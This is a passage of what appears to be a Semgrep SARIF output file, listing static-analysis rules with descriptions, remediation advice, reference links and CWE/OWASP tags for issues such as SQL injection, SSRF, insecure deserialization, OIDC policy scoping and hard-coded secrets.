CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.open-redirect-pathname.open-redirect-pathname"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"help":{"markdown":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy)\n - [https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy)\n - [https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/](https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/)\n","text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","id":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","name":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"help":{"markdown":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","id":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","name":"python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://dispatchhttp.org/Dispatch.html](https://dispatchhttp.org/Dispatch.html)\n","text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","id":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","name":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"help":{"markdown":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors)\n - [https://flask.palletsprojects.com/en/3.0.x/debugging/](https://flask.palletsprojects.com/en/3.0.x/debugging/)\n","text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"helpUri":"https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","id":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","name":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fauth~2Fssrf~2Fgeneric)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf.tainted-ssrf","id":"java.servlets.security.tainted-ssrf.tainted-ssrf","name":"java.servlets.security.tainted-ssrf.tainted-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf.tainted-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"help":{"markdown":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2)\n","text":"multiprocessing.Process.kill() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use terminate()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-multiprocess2","id":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","name":"python.lang.compatibility.python37.python37-compatibility-multiprocess2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-multiprocess2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"help":{"markdown":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n","text":"Functions reliant on pickle can result in arbitrary code execution. Consider loading from `state_dict`, using fickling, or switching to a safer serialization method like ONNX"},"helpUri":"https://semgrep.dev/r/trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","id":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","name":"trailofbits.python.pickles-in-pytorch.pickles-in-pytorch","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"help":{"markdown":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session)\n - [https://en.wikipedia.org/wiki/Session_poisoning](https://en.wikipedia.org/wiki/Session_poisoning)\n","text":"Session key based on user input risks session poisoning. The user can determine the key used for the session, and thus write any session variable. Session variables are typically trusted to be set only by the application, and manipulating the session can result in access control issues."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-session.tainted-session","id":"php.lang.security.injection.tainted-session.tainted-session","name":"php.lang.security.injection.tainted-session.tainted-session","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-session.tainted-session"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","id":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","name":"java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jdbc-sqli.jdbc-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"help":{"markdown":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Variable `$X` is likely modified and later used on error. In some cases this could result in panics due to a nil dereference"},"helpUri":"https://semgrep.dev/r/trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","id":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","name":"trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.invalid-usage-of-modified-variable.invalid-usage-of-modified-variable"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"help":{"markdown":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n","text":"The protocol scheme for this proxy is dynamically determined. This can be dangerous if the scheme can be injected by an attacker because it may forcibly alter the connection scheme. Consider hardcoding a scheme for this proxy."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","id":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","name":"generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-scheme.dynamic-proxy-scheme"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","id":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","name":"python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.rocket.nosql.mongodb-taint.mongodb-taint","id":"rust.rocket.nosql.mongodb-taint.mongodb-taint","name":"rust.rocket.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"An expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.el-injection.el-injection","id":"java.lang.security.audit.el-injection.el-injection","name":"java.lang.security.audit.el-injection.el-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.el-injection.el-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"help":{"markdown":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Detected user input flowing into a manually constructed HTML string. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data. To be sure this is safe, check that the HTML is rendered safely. You can use the OWASP ESAPI encoder if you must render user data."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-html-string.tainted-html-string","id":"java.spring.security.injection.tainted-html-string.tainted-html-string","name":"java.spring.security.injection.tainted-html-string.tainted-html-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-html-string.tainted-html-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","id":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","name":"python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pg8000.python-pg8000-hardcoded-secret.python-pg8000-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","id":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","name":"java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisfactory-hardcoded-password.jedis-jedisfactory-hardcoded-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","id":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","name":"python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-secure-false.fastapi-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, 